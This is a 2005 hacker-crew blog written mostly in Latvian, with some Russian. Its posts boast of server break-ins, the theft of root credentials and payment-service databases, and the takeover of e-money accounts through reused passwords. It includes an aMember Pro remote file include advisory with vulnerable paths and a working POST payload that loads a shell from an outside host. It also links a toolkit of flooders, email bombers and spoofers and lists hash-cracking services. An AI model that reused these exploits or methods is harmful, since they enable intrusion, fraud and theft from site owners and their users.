by r0t,der4444,cembo,VietMafia

Saturday, September 24, 2005

Manis nebus vienu nedelu

Velejos pateikt ka man pa darba darishanam ir jaaizlido uz kanadu vienu nedelju, bushu prom , tapec paskastites un guljas uz RaZbH pleciem , kuru shodien onlaina nesastapu. der4444 ipashi palidzet nevares , jo pashlaik vel tikai macas latvieshu valodu:) Apsolito video uztaisihu kad atgriezishos no komandejuma.
Bet varbut ari RaZbH, bus laiks jus ar kaut ko jaunu iepriecinat.
Paslaik forums downa, bet to noversim driz.
Viens patikamais faktors ir tas ka arvien vairak bloga apmekletaju ir no Latvijas..Tas tikai nozime , ka ejam uz pareizo pusi.

Wladimir Klitschko VS Samuel Peter

Image Hosted by ImageShack.us

Pats nodarbojos ar boksu, kaut daudzi uzskata ka datortarppi ir tikai ar brillem mazi saravushies, bet boksu es milu.
Vitalijs ir daudz labaks ne Vladimirs, nekas paskatisamies, kada cinja bus.
Abu bralju vienu no treneriem bijushajiem pazistu personigi,tiem kam nebus izdevibas noskatities pa TV sheit bus links uz livestream:

  • LiveStream +Info
  • Friday, September 23, 2005

    Программирование в Delphi глазами хакера


    В книге вы найдете множество нестандартных приемов программирования на языке Delphi, его недокументированные функции и возможности.
    Вы узнаете, как создавать маленькие шуточные программы. Большая часть книги посвящена программированию сетей, приведено множество полезных примеров. Для понимания изложенного не нужно глубоких знаний, даже начальных сведений о языке Delphi хватит для работы над каждой темой.

  • down
  • FF vs...ie

    Par internet parlukiem pateiksu ko es domaju.
    Pamudinaja man izteikties pods n°2 raksti un komentari.
    Varu pateikt ka pilniba piekritu Symantec specialistiem par to ka FF ir nedroshaks parluks neka IE (kaut vinu nortons ir pedeja draza).
    Nepatik vispar man ta visa FF manija , atliek tikai ieskatities sec listos vai saucamajos bug trekos,neapshuabams liders bus FF/Mozila parluks un tas jau ir labu laiku , lidz ko savairojas ka senes pec lietus FF lietotaji.
    Pasi loti labi zinat , tos % cik daudz lieto kadus parlukus cilveki, tad kad FF bus aptuveni vienads % ar IE vai apmainisies ar vietam, nezinu vai tadas dienas pienkas , bet pienemsim ka vienu dienu pienaktu, tad ievainojamibas butu 10 reizes vairak. Tad atkal kliegtu ka redz ieejot XXX saita dabuju zarazu jo lietoju FF.
    Un varu pateikt droshi lielakoties visiem ir pilinigi pohuj open-source fanatims vai patriotisms uz browseru ievainojamibam cilveki pelna naudu, un ja FF lietotu vairak neka cutus browserus , tad visa naudas pelnishana tiktu virzita uz FF...
    A pashlaik FF ir mazs intresants pasakums ta saucamajiem ljaunadariem, reti kuram intrese FF exploiti...
    Par to ka mikrosofts lenak noversh ievainojamibas savam parlukam ta ir cita lieta,paviasm cita opera, mikrosoft jau nav tikai browzera izstradatajs .
    Neesmu nekads mikrosofta fanats un IE praktiski nelietoju, bet IE ir daudz drosaks parluks neka FF, to varu droshi apgalvot.
    No dark puses skatoties , pienemsim esmu es sliktais zens es vai kads cits atrod abos browzeros ievainojamibas , POC ja tiks publiskots tad ne pats labakais kada no sec saitiem. Ar to bus par mazs, par IE ievainojamibu Bills sola ja nekludos 20 tonas labumus.
    Par FF atklashanu var mazliet pafleimot pa bug trackiem tas ari viss un iedomaties ka esi labais salatetis , kas palidz uber labajam open -source projektam.
    Talak exploita izveidojam exploitu , IE minimala cena sakas ap 500$ ... FF butu jamekle kuram vispar vajag tadu...
    20 tonas no Billa vai sakot no 500$ par katru pardoto IE exploitu protams ka izdevigam ir exploitu notirgot tautas,pat ievainojamibu nevajag atklat to atklaj kads cits fleimu nopelna, bet tev tik atliek uzcept exploitu.
    Ta cena svartas principa no efektivitaes, ja nostradas uz liidz 20% IE lietotaju cena bus 500-1000$ , ja uz 50% tad 1000-5000$ ...
    Runajot par cenam es velos vienkarshi atzimet to ka cik daudz cilvekiem intrese FF ievainojamibas un cik IE... un tas viss tapec ka IE parluks ir viss pielietojamkais parluks weba, un tas nemainisies vel daudzus gadus.
    Bet kas attiecas uz riebigajiem saitiem kur cilveki sakker visadu drazu , 90% saita adminis pat nav lietas kursa ka uz vinja index.html vai kadas citas lapas karajas launs exploits , kursh ielade to ko vajag izmantojotot upura parluka ievonojamibu.
    Tapec biezhi vien tiek piemineti XXX saiti, jo cilvekam lielakties galva ir tikai tie tris krusti. aga Trafiks labs , parastam tgp saitam saskrien normlala gadijuma ap 100 tonam unikalo... no tiem ap 70% ir IE lietotaju un aptuveni 15% FF.

    Ok tad kad velak par FF pro prasis naudu , tad ari liksat FF pogas sava saita fuuteri?

    Thursday, September 22, 2005

    Musu cilvekiem musu pasts

    Kamer mes nemamies un kaut ko experimentejam ienaca ideja piedavat bezmaksas pastkastites .
    Kada no siem domeniem :

    tavs_vards@hackers.by.lv
    tavs_vards@hacker.by.lv
    tavs_vards@hacked.by.lv
    tavs_vards@carders.by.lv
    tavs_vards@carder.by.lv
    tavs_vards@illegal.by.lv
    tavs_vards@linux.by.lv
    tavs_vards@mail.by.lv
    tavs_vards@root.by.lv
    tavs_vards@r00t.by.lv


    paskatites nae prieksh lielu failu glabashnas, bet prieksh vestulu rakstishanas un sanemshanas.
    20mb izmers bus defaulta , ja kadam vajadzes palielinat paskatites izmerus , to vares izdarit sazinoties ar mums.

    Gribi jau tagad aiznemt savu vardu, izmanto iespeju pievienot komentaru.
    Komentaram noteikti ir jabut garakam par frazem "iedo pastakasti" "dod meilu" "es ari gribu"

    Wednesday, September 21, 2005

    Kas notiek

    Paslaik visi esam parak aiznemti ar personigajam darisanam, iszkatas ka dazhi no mums ir parak aiznemti, tapec drohi vairs nav musu rindas redzami.

    RaZbH,censhas mazliet izmainit forumu kursh pashlaik relal izstradas stadija un nekas tur nenotiek, pamaniju vienu klud ieks Vbulletin , tagad RaZbH skatas vai ir iespeja noverst..aga vieglak ir atrats,lauzt un ganit ,neka labot un radit...Katra zinja ja kaut ko atradisim vel tad noteikti dabusiet zinat pirmie.

    Kas saistas ar forumu, forums bus principa anglu valoda ar atsevishu LV sadalu, jo tikai LV , jus varat redzet piemeru netsec.lv , ka latvija nav daudz tadu kas intresejas par nedroshibu un droshibu.

    Taka musu rindas samazinjas del neaktibitates, tad paradijas paris brivas vietas cilvekiem , kas ir uz kaut ko spejigi.

    par Video Hack Crew , nezinu vai tas bus musu nosaukums, itka parak prasti skan nu nezinu iespajams ka ari paliksim zem ta nosaukuma.

    Domaju nakamo video uztaisishu ka iegut latvijas e-pastu spam bazi , kaut vai delfi,bus brivaks vakars ieslegshu camsutio un skatisamies cik "unsecured systems" ir ieks LV.

    Sanaca man mazliet pasmieies par jaunam baumam, ko nacas dzirdet ka hackers lv kaut ko izdarijusi esam. Butu mulkigi zinot to publiku kuri tani pasa diena skries uz menteni ar asaram acis , ka redz kads vinus ir abizhojis vai ka saita vairs nav vai ticis indexets ,ka pamanijat bloga stav vinu poga , tas nozime ka esam draudzigas un ne draudigas attiecibas ar viniem vismaz ta izskatas, ja nu kads varonis neizdomas izlekt ar tadiem pasiem trikiem , ka pret netsec lv to darija broadcast.
    Tapec stav vienkarsh links uz musu blogu un nekas vairak.

    Tuesday, September 20, 2005

    Hamachi -Mediated p2p Technology



    Intresants p2p* , kas lauj izveidot shifretus tiklus blastoties uz AES-256.

    Mazliet citeshu:

    Message Security

    The first thing that happens after the client connects to the server is a key exchange. This exchange produces keying material used for encrypting and authenticating all other protocol messages.

    Messages are encrypted with symmetric cipher algorithm and authenticated with MAC. Every message is also uniquely numbered to prevent replay attacks.


    Server Identity

    Each Hamachi server owns an RSA keypair. The public key is distributed with client's installation package and thus it is known to the client prior to the first contact.

    When the client connects to the server, it announces which identity he expects the server to have. If the server has requested identity, the login sequence commences. In the last message of this sequence the server sends a signature of client's data and this confirms server's identity to the client.



    The Framework

    A Hamachi system is comprised of backend servers and end-node peer clients. Server nodes track client's locations and provide mediation services required for establishing direct peer-to-peer tunnels between client nodes.

    When the client is activated, it establishes TCP connection to one of the mediation servers and starts speaking Hamachi protocol to log itself in and synchronize with other clients.

    The rest of the document deals with security provisions of this protocol, which ensure both privacy and authenticity of all client-server and client-client communications.


    saits: http://www.hamachi.cc/



    Piebildisu ka interfeis man iepatikas , skrein uz windas un pingvina.

    Museja testa istaba: LVnet
    parole:0000

    Saturday, September 17, 2005

    Программирование на C++ глазами хакера


    Автор рассматривает множество нестандартных приемов программирования и примеры использования недокументированных возможностей языка C++ при разработке шуточных программ и серьезных сетевых приложений, которые могут помочь при создании программ диагностики сетей, управления различными сетевыми устройствами и просто при повседневном использовании интернет-приложений. Знакомство с приемами и алгоритмами, которые используют хакеры для написания своих утилит, позволит Вам создать собственную надежную систему обороны. Для эффективного освоения материала Вам понадобятся минимальные знания C++ и начальные навыки общения с компьютером и мышкой, а книга поможет познать хитрости хакеров и секреты профессиональных программистов.

    HACKERS Toolkit 2005

    HACKERS Toolkit 2005 - 140 hax0ru progas:]


    Golden eye 2005
    HellLabs Proxy Checker v7.4.18
    HostScan v1.6.5.531
    Invisible Browsing v4.0
    IPScanner v1.86
    Ascii Factory 0.6
    Cool Beans NFO Creator v2.0.1.3
    Dizzy v1.10
    Feuer's NFO File Maker v2.0
    Ims NFO&DIZ Maker 1.87
    Inserter v1.12
    NFO Creator v3.5.2
    NFO Maker 1.0
    Patchs All In One 2005
    SoftIce 4.05 -Win 2000-XP
    IP Address Scanner
    IP Calculator
    IP Converter
    Port Listener
    Port Scanner April 2005
    Ping
    NetStat 2005
    Cool Trace Route 2005
    TCP/IP Configuration
    Online - Offline Checker
    Resolve Host & IP
    Time Sync
    Whois & MX Lookup
    Connect0r
    Connection Analysator and prtotector
    Net Sender April 2005
    E-mail seeker
    Cool Net Pager
    Active and Passive port scanner
    Spoofer
    Hack Trapper
    HTTP flooder (DoS)
    Mass Website Visiter
    Advanced Port Scanner
    Trojan Hunter Multi IP April 2005
    Port Connecter Tool
    Advanced Spoofer
    Cool Advanced Anonymous E-mailer April 2005
    Simple Anonymous E-mailer
    Anonymous E-mailer with Attachment Support
    Mass E-mailer
    E-mail Bomber
    E-mail Spoofer
    Simple Port Scanner (fast)
    Advanced Netstat Monitoring
    X Pinger
    Web Page Scanner
    Cool Fast Port Scanner
    Deep Port Scanner
    Fastest Host Scanner (UDP)
    Get Header
    Open Port Scanner
    Multi Port Scanner
    HTTP scanner (Open port 80 subnet scanner)
    Multi Ping for Cisco Routers
    TCP Packet Sniffer
    UDP flooder
    Cool Resolve and Ping
    Multi IP ping
    File Dependency Sniffer
    EXE-joiner
    Encrypter
    Advanced Encryption
    File Difference Engine
    File Comparasion
    Mass File Renamer

    Add Bytes to EXE
    5 Cool Variable Encryption
    Simple File Encryption
    ASCII to Binary
    Enigma
    Password Unmasker

    Credit Card Number Validate and generate
    Create Local HTTP Server
    eXtreme UDP Flooder
    Web Server Scanner
    Force Reboot
    Cool Webpage Info Seeker
    Bouncer
    Advanced Packet Sniffer
    IRC server creater
    Connection Tester
    Fake Mail Sender
    Bandwidth Monitor
    Remote Desktop Protocol Scanner
    MX Query
    Messenger Packet Sniffer
    Cool API Spy
    DHCP Restart
    File Merger

    Analysis :
    OllyDbg 1.10
    W32Dasm 8.93 /w patch
    PEiD 0.92

    Rebuilding :
    ImpRec 1.6
    Revirgin 1.3
    LordPE RoyalITS

    Packers :
    FSG 2.0
    MEW 11 1.2 SE
    UPX 1.25

    Patchers :
    dUP 1.11
    CodeFusion 3.0
    Universal Patcher Pro 2.0
    aPatch 1.07 (*New)
    PMaker 1.1.0.0 (*New)
    Tola's Patch Engine 2.03b
    ABEL Loader 2.31

    HEX Editor :
    BView 5.6.2

    Decompilers :
    DeDe 3.50.04
    Flasm

    Unpackers :
    Alot! ( ASProtect, ACProtect etc )

    Others :

    FileMon
    RegMon
    RSATool 2
    d*mn HashCalc
    Krugers ToolBox
    EVACleaner 2.7 (*New)
    Process Explorer (*New)
    Resource Hacker (*New)
    PUPE 2002 (*New)

    40.57 МB

    Part 1
    http://www.awz.ru/downloader/Hackers_toolkit_2005.part1-1.rar
    Part 2
    http://www.awz.ru/downloader/Hackers_toolkit_2005.part1-2.rar
    Part 3
    http://www.awz.ru/downloader/Hackers_toolkit_2005.part1-3.rar

    Thursday, September 15, 2005

    Vienas nakts stasts

    Ka vienmer sedeju pie savas kastes un darbojos sava nodaba , pieklauveja cilveks un uzprasija vai varu vinjam ar veinu saitu palidzet.
    Atri parskatot resursu ipashas kludas nepamaniju , tapat serveris bija updeitots, porti ciet un viss baigi labi bija, domaju nebus viegls darbinhs.
    Tomer pec studnam divam taustot, sataustiju vietu pa kuru uzlizt uz servera kur atradas vajadzigais saits.
    Kad biju uz servera, biju iepriecinats par adminja chaklibu visas manas iespjas bija apgrieztas lidz maksimumam.. Ok kad tiku vajadziga lietotaja mape ieraudziju ka viss ir kodets ar sourceguardian. Ok izdomaju ka jaiet cits celjs, bet pirms tam vel pamaniju vienu mapi kurai bija patikams nosaukums /storage/ ...apskatot saturu kur bija kaudze ar visadamam mapem kuras glabajas .doc faili pamaniju starp vinjiem arhivetus shell komndu failus... nezinu prieksh kam vinji glabaja tos, bet tajos atradu izpilditas komandas , kuras bija tada infa ka servera root konta izveidoshana...pats galvenais ka ne viena bet kopa 18 serveriem root -/whm/ssh/ftp
    konti... teikshu ne slabo:)
    Ta protams mana arhiva ienaca vel 18 serveri kuri teikshu nemaz tik sudigi nebija.

    Socialka, pa 50 rubliem.

    Shoreiz iemetishu vienu logu no vakardienas sarunas ar vienu koderi.
    Ievadam lai labak iebrauktu saruna:
    Viena no forumiem pamaniju ka cilveks rakstot vajadzigas mantas, tani bridi man vajadzeja jaunu proxy troju.
    Tipa pasutiju , tipa ari uztaisija kad palaizhot konfiguratoru , apskatijos ko tad uz mana kompa izveido..viss ka runats pats trojs svera 2kb, bet pamaniju ka mana icq mapeparadijas viens intresants .dll fails kursh pec tam ludzas ugunsmurim iziet neta.Tur nebija daudz ko domat redzot to pasakumu , iedevu vienam no draugiem apskatit konfiguratoru , un ka izradaas rakstits bija uz VB , nevis ka bija apsolits. Tad izdomaju mulkki pametat un paskatities kas vinjam aiz adas.



    www.webmoney-exchange.com/Big_lohotron.txt

    Vajag zimetaju.

    Vajag zimetaju kursh uzimes labu logo/main baneri prieksh foruma http://209.123.181.253/~videohackr/forum/.

    +
    Tapat kursh varetu palidzet ar saita dizainu.
    icq:10001000six
    r0t3d3vil at email.su

    Vajag zimetaju.

    Vajag zimetaju kursh uzimes labu logo/main baneri prieksh foruma http://209.123.181.253/~videohackr/forum/.

    icq:10001000six
    r0t3d3vil at email.su

    Monday, September 12, 2005

    Video -Hack mile2.com

    Aiz gara laika uztaisiju vienu jaunu video hacku, reali neka tur vina nav un + itka biju domajis ieprieksh sagatavoties lai labaka kvalitate, bet neka un partaisit negribas tapec lai paliek ka ir.
    Video balstas protams kartejo reizi uz nolaidibu , shoreiz no drosibas specialistu puses. Ka parasti neko nedemoleju un biju baigi labais cilveks .
    Tatad, visa fishka pastav uz agrinas phpMyAdmin 2.5.4 versijas.
    Ne ka tur ipasa, nebutu ja tas saits nesauktos mile2.com , bet gan jankas.homepage.com. Reali tas ir tikai humors un nekada maksla.

    video ir atrodams http://r0t.h15.ru/mile2.rar

    Saturday, September 10, 2005

    Video -Hack Intgold,E-gold,Paypal,Moneybookers,etc

    OK. Vispirms pateikshu ka video tapa ne prieksh ta lai paraditu cik kruts esmu, bet gan lai paskaidrotu cilvekam ,ka tas viss izskatas.
    UN kvalitate video matrealam + tekstam taja ir ljoti zema, ta nav pakozuha, bet gan vienkarsh atrs "how to"

    Mes jau ieprieksh runajam par e-naudu , shoreiz es pieversishos mazak popularam variantam , ka iegut ne tikai e-naudz kontus, ka Paypal,E-gold,Moneybbokers,Intgold,Evocash,Netpay,SFIpay,Stormpay,PicPay u.c , bet tie var but jebkuru citu sistemu konti.

    Shada "hack" sistema principa balstas uz socialas inzhinierijas vienkrashakajiem pamatiem(Parasts Cilveks "nav" spejigs atcereties vienlaicigi 10 paroles kuras nav vienkarsh burtu salikums, tapec izmanto vairakos resursos vienu)
    Esmu izmantojis ne tikai e-naudas kontu iegushanai, tapat shadu sistemu esmu izmantojis visur kur ir iespejams.
    Pats patikamakais ir tas ka sheit nav atkarigs , piem. vai webaplikacija(saits/forums/u.c) ir ievainojma vai ne, pat daudzi super-buper mega webmasteri pielauj shadas kljudas,sakonfigurejot visu ka nakas , tik piemirstot shadu elementaru lietu.
    Vienreiz ar bija pasakums kur man vajadzeja tikt ieksha par jebkuru cenu, ievainojamibas neatradu tur nekur, kad mazliet pagoogleju webu atradu to administratoru vairaks vietas ka reggistretu lietotaju, protams , pari no vinjam diezgan viegli ljava piekljut Mysql bazi kur panjmeu hashu, pec tam apskatot atshifreto hashu rezultatus(paroles) pamaniju ka tur figure tikai divas paroles viena bija elementara "123456" un otra bija daudz sarezhggitaka, bet abas tika izmanotatas atkariba no ta konta svariguma prieksh lietotaja.
    Pat nemeiginot pirmo , bet uzreiz ar otro iegaju elementari admin paneli un pec tam izdariju ko man vajadzeja.
    Pec ta skatoties, droshi var teikt ka biezhi vien "non-crackable saitus, mazliet padomajot var..".
    OK. atgriezisimies pie video , video ir iss + galvenais ir paradits pats darbibas princips, parejais ir fufelis.

  • Video sheit
  • Public Sploits Suck

    I learned a valuable lesson a couple weeks ago. Posting vulnerabilites for software publicly is a big mistake. Example: Amember pro
    I read the source for this and found some nice registered_globals=on exploits. I then hacked the main aMember server and got a backup of their database. Looked through it, and didnt see anything important. So I post for the newAngels team. It sits in the newAngel board for about a month. No one seems to care about it. I didnt think it was that great of an exploit either because the customer database was small and had no big names.

    So I decide to post publicly. The public post you can read below. Then the day after it shows up on securityfocus.com I start getting flamed. The vulnerability I just posted was on several billing companies and even a few banks! Personally, I have only been in a couple smaller billing companies. So not only did I ruin my chances at being able to access these systems, but I allowed a ton of script kiddies into these systems! I did all the work, and the script kiddies got all the benefit.

    Then a group called the Zealots brings me to my next point. They began to flame me for releasing THEIR exploit publicly! HOW THE FUCK CAN YOU OWN AN EXPLOIT!! I discovered it the same way they did, by reading source code. Sure the Zealots may be elite or whatever, but fuck them and their ignorance. You can't own an exploit.

    What will I do with my exploits in the future? I do not know.

    par hash @ online

    MD2
    MD4
    MD5
    SHA-1
    SHA-2 (256)
    SHA-2 (384)
    SHA-2 (512)
    RIPEMD-160
    LM
    NT
    MySQL323
    MySQLSHA1
    Cisco PIX
    VNC Hash

    Soreiz parunasim par hashiem, ja pamanijat tad viena no iepriekshejiem maniem postiem biju publicejis icq log. failus jeb vienkarshi sarunas ar haxoretiem puikam.
    Tad luuk tapat ka daudzi saka ka brute force saitiem un serveriem ir banalali, to pashu es varu teikt par hashiem , kaut patiesiba ir nevisai lidziga tam.
    Pirms kada laba laika bijs paris tuulji, ar kuriem vienkrash lietotajs vareja atshifret hasha rezultatu un iegut vajadzigo paroli, viss iet uz priekshu.
    Pirmais onlain pasakums popularais paradijas aptuveni pirms 1,5 gada.
    UZ sho brdi ieskatisamies kadi publiskie shada veida pasakumi ir sastopami:

    http://passcracking.com/ Strada jau aptuveni 1,5 gadu shis onlain lauznis, popularitate dara savu pec ta ka tika nopublicets un izreklamets slashdota un citos zinu resursos , ta rindas galu nemaz nevar saredzet.

    http://gdataonline.com/ - otrs popularais pasakums ir , kursh nemaz nav lauznis bet vienkarsh 12 miljonu liels hashu un to rezultatu krajums, kuru var papildinat jebkursh. Drausimigi parlielija tas pats vien slashdots + parejie, bet reali tur neka nav itsevishkki ja skola metematika ir bijusi ari pec treshas klases.
    Tapec ka 12 miljoni nekas nav salidzinot ar visiem iespejamiem variantiem.

    http://www.plain-text.info/ Shis pasakums ir duadz klusaks, bija galaigi klus , tad kad bija lielais bums uz passcracking.com, tad jau shis pasakums pastaveja, pec tam tika popularizets no govermentsecurity puses ,pec principa "roka roku mazga",personigi zinu pasakuma galveno vaininieku un neko labu nevaru teikt, tapec ka izcelas ar "white hat" propagandu pazinju loka.


    http://us.md5.crysm.net/ Viens mazak populars , bet ar skaitljiem labakiem itka neka
    gdataonline , pasi varat salidzinat.

    http://www.milw0rm.com/md5/info.php milw0rm visi lielakoties zin ka 0day exploitu saitu, ari tur var lm un md5 mazas devas lauzit.

    http://md5.t145.1paket.com/md5crack.php Velviena md5 online baze ar mazliet vairak neka 5,6 mil. hashu.

    http://www.securitystats.com/tools/hashcrack.php Itka onlain dic. attack lauznis, kas strada ne tikai ar md5, , bet ari SHA1,MD4,NT,LM.


    http://md5.rednoize.com/ Vel viena md5 onlain baze ,kas mazliet atgadina googli,tikai funkcija ir viena . satur mazliet mazak neka 2 mil. hashus.

    http://md5crack.it-helpnet.de/ Plus velviens maz apmeklets onlain lauznis. Rainbow tables, gan ta pamaz, bet gan jau ari kadam ar to pietiek.


    Protams ka es apskatiju paris no visiem pieejamiem online pasakumiem, pats lietoju vai nu uz savas kastes vai uz sveshas kastes, tjipa ari skaitas onlaina:)

    Thursday, September 08, 2005

    Talak, jeb Video Hack

    Pirmkart velos pateikties labdariem kuri velejas palikt anonimi par paris GB uz viena no .RU serveriem .
    Paslaik tikai ir iemests forums http://209.123.181.253/~videohackr/forum/, kursh vel gaida savu konfiguraciju, saita dzina izvele bus gruta , no 0 rakstit butu parak ilgs laiks , bet cilveki grib "action" tulit. Tapec ari bus jaizvelas kas gatavs gabals + max. mazliet modificejot to.

    Par saitu varu teikt ka tas bus saistits pa tiesho un paredzets prieksh video-visual hacking.

    Matreals publiceshanai ir pieteiekoshi, bet katra zinja jebkuram bus iespeja pievienot savu video .
    Tapat ja ir velme tad var iestaties video-meikeru rindas.

    saits un forums bus ENG valoda , ja kads nenoslinkos iespejams bus ari LV valoda.

    Pats pasakums varetu but mazliet pielidzinams , ka defeisu spogulim zone-h.org
    Bet vispar pat diezgan legals pasakums.

    Wednesday, September 07, 2005

    Cik tad musu haxoretie puishi ir specigi.

    Iemetu prakstiski pariti viens logs ir pirms paris dienam un viens shodienas.
    Logs numur viens ir no puisha kursh itka tikai nesen ir ielidis shtelle.
    Otrais logs ir no cilvja kuram uzdeva uzdevumu viens cits mega hax0rs kursh netika gala ar to jautajumu.

  • logs numur 1

  • logs numur 2




  • PS. pats galvenias ka tadu megahaxoreto puishu ir pilns nets un katrs ir krutaks par otru:)

    Tuesday, September 06, 2005

    Sodien nav nolaists karogs.

    Ar tik nostalgiski filozofisku nosaukumu varetu ceret kad es rakstishu depresivi kroplainu txt lai p*stu jums smadzenes.
    Ne , ari ta nebus ka iesakto pametisim novarta, ja bloga nav katru dienu raksta tas nenozime ka nav velmes mums kaut ko jauno uzrakstit vai pastastit vienkarshi, bet mums ir jaturas uzstaditajos ramjos un 90% informacijas kas sheit varetu but un kuru es gribetu publice ir diemzhel aizliegta.
    Protams ta informacija nekur nepazud un domaju drizuma , varesim jus iepriecinat ar jaunu projektu.
    Kas bus principa legals pasakums , tapat + prieksh nelegaliem objektiem bus atveleta vieta uz cita servera, kas un ka tur notksies to ieraudzism pec laika.

    Monday, September 05, 2005

    aMember Pro 2.3.X - Remote File Include Vulnerability

    [NewAngels Advisory #2] aMember Pro 2.3.X - Remote File Include Vulnerability
    =============================================================================


    Software: aMember Pro 2.3.4
    Type: Remote PHP File Include Vulnerability
    Risk: High

    Date: Aug. 16 2005
    Vendor: CGI Central


    Credit:
    =======
    NewAngels Team with special note of 4Degrees.


    Description:
    ============
    "aMember is a flexible membership and subscription management PHP script. It has support for PayPal, BeanStream, 2Checkout, NoChex, VeriSign PayFlow, Authorize.Net, PaySystems, Probilling, Multicards, E-Gold and Clickbank payment systems (complete list can be found here) and allows you to setup paid-membership areas on your site. It can also be used without any payment system - you can manage users manually."
    [http://www.amember.com/]


    PHP Requirements:
    =================
    register_globals = On


    Vulnerability:
    ==============
    Source:
    >global $config;
    >[...]
    >require_once($config['root_dir']."...somestring...");




    Exploitation:
    =============
    This vulnerability exists in several files, the code is not exactly the same in all files.
    But the exploit does remain the same.

    Example:http://www.somesite.com/aMember/plugins/db/mysql/mysql.inc.php
    POST: config[root_dir]=http://www.geocities.com/angelteamfiles/shells/banner.php?

    Vulnerable Files:
    /aMember/plugins/db/mysql/mysql.inc.php
    /aMember/plugins/payment/efsnet/efsnet.inc.php
    /aMember/plugins/payment/theinternetcommerce/theinternetcommerce.inc.php
    /aMember/plugins/payment/cdg/cdg.inc.php
    /aMember/plugins/payment/compuworld/compuworld.inc.php
    /aMember/plugins/payment/directone/directone.inc.php
    /aMember/plugins/payment/authorize_aim/authorize_aim.inc.php
    /aMember/plugins/payment/beanstream/beanstream.inc.php
    /aMember/plugins/payment/echo/config.inc.php
    /aMember/plugins/payment/eprocessingnetwork/eprocessingnetwork.inc.php
    /aMember/plugins/payment/eway/eway.inc.php
    /aMember/plugins/payment/linkpoint/linkpoint.inc.php
    /aMember/plugins/payment/logiccommerce/logiccommerce.inc.php
    /aMember/plugins/payment/netbilling/netbilling.inc.php
    /aMember/plugins/payment/payflow_pro/payflow_pro.inc.php
    /aMember/plugins/payment/paymentsgateway/paymentsgateway.inc.php
    /aMember/plugins/payment/payos/payos.inc.php
    /aMember/plugins/payment/payready/payready.inc.php
    /aMember/plugins/payment/plugnplay/plugnplay.inc.php

    orginal advisory:
    http://pridels.blogspot.com/2005/09/amember-pro-23x-remote-file-include.html

    Friday, September 02, 2005

    Terms of Service Violation


    Hello,

    We'd like to inform you that we've received a complaint that your blog
    (pridels.blogspot.com) contains confidential information. Please note that
    our Terms of Service prohibit posting confidential items on your blog.
    Accordingly, we have had to remove the content in question.

    Please refer to our Terms of Service for more details:
    http://www.blogger.com/terms.g

    Thank you for your understanding.

    Sincerely,
    Blogger Support


    Sakas viss ar vienkarshiem toplistiem un skaititajiem,tagad ari kads pasudzejas jau musu bloga hosterim.
    Ko darisim talak?
    Ja jus varat hostet tadu pasakumu tad ludzu mans meils r0t3d3vil@email.su
    Tapat ja ir kada ideja vai informacija kas ljautu izdzivot shim pasakumam ,tad droshi meilojiet.
    Tapat kursh ir ieeintresets piedalities slegta tipa pasakuma , var droshi meilot savus datus man ,berni atpushas.

    PS.Naksies man tagad aizvakt visu "konfidencionalo" informaciju, lai jus kaut vai paspetu izlasit sho zinu.

    mans mpe.lv

    23r05m0k3, bija iemetis parus skrinus , kuri vinam neizdevas del hvz ka.
    Tipa palika neskadriba, tapec nolemu apskaties kas tur tagad noteikas.
    Uzejot uz servera apskatijos vai kaut kas intresants nav-- jo mpe.lv ir vienkarsh meduspods(honeypot), ta es parasti saucu shadi sakonfiguretus servakus+ visas parejas shtelles.
    Pamaniju es
  • shadu shteli
  • aplukojot moficakacijas datumu + logfailus, sapratu , ka tur visiem uz visu ir po* jau diezgan ilgu laiku.
    Gribejas man paskatit admisnitracijas panela webinterfeisu, apstajos pie /forbiden , ashi apskatoties .htaccess failu , pamaniju ka nemaz tik daudz IP ir atljauto pieeja:)
    piemetu nesen uzmeto socks IP pie ta saraksta , un skatijos admin paneli.

    Ka var noproto pec klientu skaita pasakums ne ipashi labi iet uz priekshu, kad ieskatijos DB tad nopratu ka administratori ir parak daudz.

    Dzests

    Aiz hasha ir pedejais vizites laiks.
    Domajamu vot, prieksh kam vajag tadu baru aunus?
    Talak, protams ka savus klientus baro ar pronuhu uz ftp servaka, + vel ar ripotajam filmam, autortieisibu parkapums..
    Takshto shoreiz sho bloga autoru nenaksies sudzet kaut kur kamer pashi nesaks but godigi.

    Thursday, September 01, 2005

    E-nauda


    Kaa?
    Ok. Viss sakas aptuveni 1996 gada , ar e-naudu.Joprojam paypal ir viss popularaka e-nauda. Iegut citu cilveku kontus var iegut tikai protams nelegala veida,par brute force droshi var aizmirst iesaceji , ta bija iespejams vel paris gadus atpakalj , kad melnaja tirgu nebija tik lielas intreses e-nauda.
    Tad pietika uzlauzhot kadu shopu savacot kreditkas un pec tam palaizhot apgroziba tas, bet nu jau labu laiku viss ir mainijies kreditkas ir jau diezgan mirusi tema.
    Lauzhot shopus var nopenlit vairak gadus un kapeikas:)
    Populara lieta ir e-nauda, ka tad tikt ar to gala?
    Ka mineju brutot nav jegas ,skams,phishings - ari ne prieksh iesacejiem , principa ta nav tema kur list iesacejiem, jo rokas bus pa isam .
    Iesaceji var patirinaties ar kadu trojanu un , tad ir vienigi kaut kadas izredzes.
    Viena no pieejam ir webaplikaciju ievainojamiba analizeshana uz kada no "money transfer system" serveriem.
    Ja parskatit visu sarakstu ar tada veida servisiem un papetot kartigak , tad var atrast diezgan ievainojamibas, jo biezhi vien kads noslinko vai ietaupa naudu no webmasteriem augstak minetajos pasakumos.
    Busat uz dirsas , kad pateikshu ka netpay un picpay lietotaju datubazes 6 meneshu atpakalj ieguvu izmantojot elementaru phpBB ievainojamibu.
    Ka tad , ka ari shodien mans stimulejoshais faktors nebija nodarit kadam postu vai kljut atri bagatam uz citu cilveku reikkinu,bet gan personiga izglitoshanas un informacijas ieguve.
    Ta lai mazak gudrinieku butu kas gvelztu , ka redz ko te muldu

    Dzests


    Protams ka md5 hasha rezultatu es zinu, tiem ka spekam bus un paspes visu izdarit pirms tas tiks noversts(parole nomainita,utt.) tie droshi var aplukot shis naudas sistemas administracijas paneli + datubazi.
    Ja ari nomainis tikai paroli , tad man tas pieeju neapgriezis,tikshu tapat klat , tapec droshi izlieku to publiski.
    + viens ir tas ka kljuda ir tani ka administracijas panela pieeja ir standarta atrashnas vieta- /admin un tas tiesham ir glupi, tur jau ari var brutot , ja ir vieniga tada informacija.

     
    Copyright (c) 2006 Pridels Sec Crew